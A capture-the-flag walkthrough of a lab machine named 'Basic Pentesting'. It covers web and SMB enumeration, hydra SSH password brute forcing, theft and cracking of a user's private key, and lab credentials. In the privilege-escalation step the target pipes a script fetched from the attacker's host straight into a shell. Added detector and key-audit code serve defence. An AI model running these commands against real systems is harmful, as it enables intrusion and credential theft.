Basic Pentesting

This is a machine that allows you to practise web app hacking and privilege escalation

💢 We will cover these topics

  • Web Enumeration
  • Linux Enumeration
  • Brute Forcing Hash
  • Brute Forcing SSH Key

Web App Testing and Privilege Escalation

In this set of tasks you'll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

Credits to Josiah Pierce from Vulnhub.

  1. Deploy the machine and connect to our network

No answer needed

  1. Find the services exposed by the machine

No answer needed

  1. What is the name of the hidden directory on the web server (enter name without /)?

gobuster dir -u http://10.10.103.107/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.103.107/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/15 08:34:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/development (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/09/15 08:34:54 Finished
===============================================================

development

  1. User brute-forcing to find the username & password

/usr/share/enum4linux/enum4linux.pl -a $ip | tee enum4linux.log
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 15 08:36:39 2020

==========================
| Target Information |
==========================
Target ........... 10.10.103.107
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=====================================================
| Enumerating Workgroup/Domain on 10.10.103.107 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
| Nbtstat Information for 10.10.103.107 |
=============================================
Looking up status of 10.10.103.107
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

======================================
| Session Check on 10.10.103.107 |
======================================
[+] Server 10.10.103.107 allows sessions using username '', password ''

============================================
| Getting domain SID for 10.10.103.107 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
| OS information on 10.10.103.107 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at /usr/share/enum4linux/enum4linux.pl line 464.
[+] Got OS info for 10.10.103.107 from smbclient:
[+] Got OS info for 10.10.103.107 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03

==============================
| Users on 10.10.103.107 |
==============================
Use of uninitialized value $users in print at /usr/share/enum4linux/enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/share/enum4linux/enum4linux.pl line 877.

Use of uninitialized value $users in print at /usr/share/enum4linux/enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/share/enum4linux/enum4linux.pl line 890.

==========================================
| Share Enumeration on 10.10.103.107 |
==========================================

Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.103.107
//10.10.103.107/Anonymous Mapping: OK, Listing: OK
//10.10.103.107/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

=====================================================
| Password Policy Information for 10.10.103.107 |
=====================================================
[E] Unexpected error from polenum:


[+] Attaching to 10.10.103.107 using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Missing required parameter 'digestmod'.

[+] Trying protocol 445/SMB...

[!] Protocol failed: Missing required parameter 'digestmod'.


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


===============================
| Groups on 10.10.103.107 |
===============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

========================================================================
| Users on 10.10.103.107 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
[...]
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
[...]
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[...]
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[...]
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

==============================================
| Getting printer info for 10.10.103.107 |
==============================================
No printers returned.


enum4linux complete on Tue Sep 15 08:40:44 2020
  1. What is the username?

jan

  1. What is the password?

hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.103.107 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-15 08:39:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.103.107:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 14344223 to do in 1343:06h, 16 active
[STATUS] 124.00 tries/min, 372 tries in 00:03h, 14344029 to do in 1927:58h, 16 active
[22][ssh] host: 10.10.103.107 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-15 08:46:06

armando
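The hydra run above pushed roughly 178 login attempts per minute at sshd from a single source, which is the pattern an SSH log monitor should alert on. Added example (not part of the original writeup): a detector run over constructed sshd auth.log lines that flags a source IP once it exceeds a failure threshold inside a time window and marks the higher-priority case where the same IP then logs in successfully. The log lines, the hostname and the year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log lines modelled on the hydra run above (many failures
# from one source, then a success); not captured from the room's machine.
SAMPLE_LOG = """\
Sep 15 08:39:20 basic2 sshd[1201]: Failed password for jan from 10.8.106.222 port 50001 ssh2
Sep 15 08:39:20 basic2 sshd[1202]: Failed password for jan from 10.8.106.222 port 50002 ssh2
Sep 15 08:39:21 basic2 sshd[1203]: Failed password for jan from 10.8.106.222 port 50003 ssh2
Sep 15 08:39:21 basic2 sshd[1204]: Failed password for jan from 10.8.106.222 port 50004 ssh2
Sep 15 08:39:22 basic2 sshd[1205]: Failed password for jan from 10.8.106.222 port 50005 ssh2
Sep 15 08:40:02 basic2 sshd[1210]: Failed password for invalid user admin from 10.8.106.222 port 50010 ssh2
Sep 15 08:46:05 basic2 sshd[1399]: Accepted password for jan from 10.8.106.222 port 51337 ssh2
Sep 15 08:50:00 basic2 sshd[1402]: Failed password for kay from 10.10.10.5 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse(lines, year=2020):
    """Yield dicts for sshd login events; syslog omits the year, so it is supplied."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(f"{year} {ev['ts']}", "%Y %b %d %H:%M:%S")
            yield ev

def detect(log_text, threshold=5, window_s=60):
    """Flag a source IP once it logs >= threshold failures within window_s seconds.
    A later Accepted login from a flagged IP sets success_after, the case to page on."""
    fails = defaultdict(list)   # ip -> timestamps of failed logins
    users = defaultdict(set)    # ip -> usernames attempted
    alerts = {}
    for ev in parse(log_text.splitlines()):
        ip = ev["ip"]
        users[ip].add(ev["user"])
        if ev["result"] == "Failed":
            fails[ip].append(ev["ts"])
            recent = [t for t in fails[ip] if (ev["ts"] - t).total_seconds() <= window_s]
            if len(recent) >= threshold:
                alerts.setdefault(ip, {"success_after": False})
        elif ip in alerts:      # success from a source already flagged
            alerts[ip]["success_after"] = True
    for ip, a in alerts.items():
        a["failures"], a["users"] = len(fails[ip]), sorted(users[ip])
    return alerts
```

On the sample, only 10.8.106.222 is flagged, with six failures across two usernames and a later successful login; the single kay failure from 10.10.10.5 stays below threshold.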

  1. What service do you use to access the server (answer in abbreviation in all caps)?

ssh

  1. Enumerate the machine to find any vectors for privilege escalation
  • Hacker: sudo python3 -m http.server 80
  • Target: curl http://10.8.106.222/linpeas.sh | sh

[+] Files inside others home (limit 20)
/home/kay/.profile
/home/kay/.viminfo
/home/kay/.bashrc
/home/kay/.bash_history
/home/kay/.lesshst
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/.bash_logout
/home/kay/.sudo_as_admin_successful
/home/kay/pass.bak

  • Copy/paste /home/kay/.ssh/id_rsa to Hacker

No answer needed

  1. What is the name of the other user you found (all lower case)?

kay

  1. If you have found another user, what can you do with this information?

No answer needed

  1. What is the final password you obtain?

/usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.jtr

john --w=/usr/share/wordlists/rockyou.txt kay_id_rsa.jtr

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (kay_id_rsa)
1g 0:00:00:12 DONE (2020-09-15 09:05) 0.08143g/s 1167Kp/s 1167Kc/s 1167KC/sa6_123..*7¡Vamos!
Session completed

ssh -i kay_id_rsa kay@10.10.103.107
Passphrase: beeswax

kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

heresareallystrongpasswordthatfollowsthepasswordpolicy$$
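john needed about twelve seconds for kay's key because it is stored in the legacy PEM format: the "KDF/cipher ... is 0" and "iteration count is 1" lines mean the cipher key is one MD5 pass over the passphrase, so a wordlist passphrase gives little protection, and the key was readable from another account to begin with. Added example (not code from the room, john or ssh-keygen): an audit function that reads only a private key's header and reports whether it is unencrypted, legacy-MD5 encrypted, or new-format bcrypt with fewer than ssh-keygen's default 16 rounds. The keys it checks are constructed inline and carry no real key material.

```python
import base64
import re
import struct

def _s(data: bytes) -> bytes:             # RFC 4251 length-prefixed string
    return struct.pack(">I", len(data)) + data

def _rd(buf: bytes, off: int):            # read one such string -> (value, next offset)
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def audit_private_key(pem: str, min_rounds: int = 16) -> dict:
    """Report how (or whether) a private key's passphrase protection is applied."""
    head = re.search(r"-----BEGIN ([A-Z ]+)-----", pem)
    if head is None:
        raise ValueError("not a PEM-framed private key")
    body = pem[head.end():pem.index("-----END")]
    if head.group(1) != "OPENSSH PRIVATE KEY":
        # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): the cipher key comes from one
        # MD5 pass over the passphrase, which is john's "KDF/cipher ... 0=MD5/AES".
        enc = "Proc-Type: 4,ENCRYPTED" in body
        return {"format": "legacy-pem", "kdf": "md5" if enc else "none",
                "rounds": 1 if enc else 0, "verdict": "WEAK_KDF" if enc else "UNENCRYPTED"}
    blob = base64.b64decode("".join(body.split()))
    if not blob.startswith(b"openssh-key-v1\x00"):
        raise ValueError("bad openssh-key-v1 magic")
    cipher, off = _rd(blob, 15)            # header starts after the 15-byte magic
    kdf, off = _rd(blob, off)
    kdfopts, _ = _rd(blob, off)
    rounds = 0
    if kdf == b"bcrypt":                   # kdfoptions = string salt, uint32 rounds
        _, o = _rd(kdfopts, 0)
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    verdict = ("UNENCRYPTED" if cipher == b"none"
               else "WEAK_KDF" if rounds < min_rounds else "OK")
    return {"format": "openssh-v1", "kdf": kdf.decode(), "rounds": rounds, "verdict": verdict}

def make_openssh_v1(cipher: bytes, kdf: bytes, rounds: int = 0) -> str:
    """Constructed sample: only the header fields the audit reads; no key material."""
    opts = _s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = b"openssh-key-v1\x00" + _s(cipher) + _s(kdf) + _s(opts) + struct.pack(">I", 1)
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")

# Constructed legacy PEM carrying the headers an encrypted "-m PEM" key has;
# the body is a placeholder, not real ciphertext.
LEGACY_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                    "AAAA\n-----END RSA PRIVATE KEY-----\n")
```

Run over every id_* file under /home with mode and ownership checks added, this gives a defender the same list a linpeas run hands an attacker, before the attacker gets it.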